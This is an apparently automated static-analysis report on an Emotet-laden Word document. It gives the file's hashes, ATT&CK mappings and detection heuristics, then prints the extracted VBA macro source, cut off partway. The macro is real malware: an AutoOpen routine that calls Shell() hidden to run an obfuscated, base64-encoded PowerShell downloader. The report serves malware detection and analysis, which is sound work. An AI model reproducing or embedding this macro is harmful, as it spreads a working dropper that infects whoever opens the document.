Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a6d00bc4d9691d9b…

MALICIOUS

Office (OLE)

Size: 105.0 KB
Created: 2018-06-01 15:24:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 6cbaaffe67d047108aca51648f20828f
SHA-1: e84a674eaf35880f2bfb098b09c4397af9622219
SHA-256: a6d00bc4d9691d9bf1fac9ffff93c4307982ffca9c04f27b93b7c0a7216ef1df
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL firing and a critical OLE_VBA_PCODE_AUTOEXEC_EXEC firing, indicating VBA macros that execute commands. The Autoopen macro is present and calls a function (cQRHVjb) that invokes Shell(). This is consistent with Emotet's typical behavior of downloading and executing a second-stage payload. The ClamAV detection also explicitly names Emotet.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-7076471-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7076471-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9910 bytes
SHA-256: 901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PhFlrjYcnObvl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cQRHVjb()
On Error Resume Next
SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm
WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224)
WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa
vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN
PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071)
End Function
Sub Autoopen()
On Error Resume Next
jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW
cajlj = CSng(24504 * CInt(31062) + 63795 - 62076)
cQRHVjb
iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism
VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784)
End Sub


Attribute VB_Name = "UomwAvk"
Function nMzwGJi()
On Error Resume Next
KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo
XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292)
HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG"
uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp
JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913)
hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA"
BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO
KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505)
DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA"
TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV
VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968)
drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB"
XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM
PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325)
wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A"
CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu
cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046)
RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA"
CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk
FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224)
mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB"
saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh
qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048)
twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA"
QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM
bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916)
qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ"
VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr
NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363)
kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA"
nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU
End Function
Function XnEFnBOVwi()
On Error Resume Next
FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY
REswk = CSng(34923 * CInt(16290) + 46084 - 12104)
EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A"
zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ
hSzKI = CSng(23924 * CInt(14396) + 1428 - 8
... (truncated)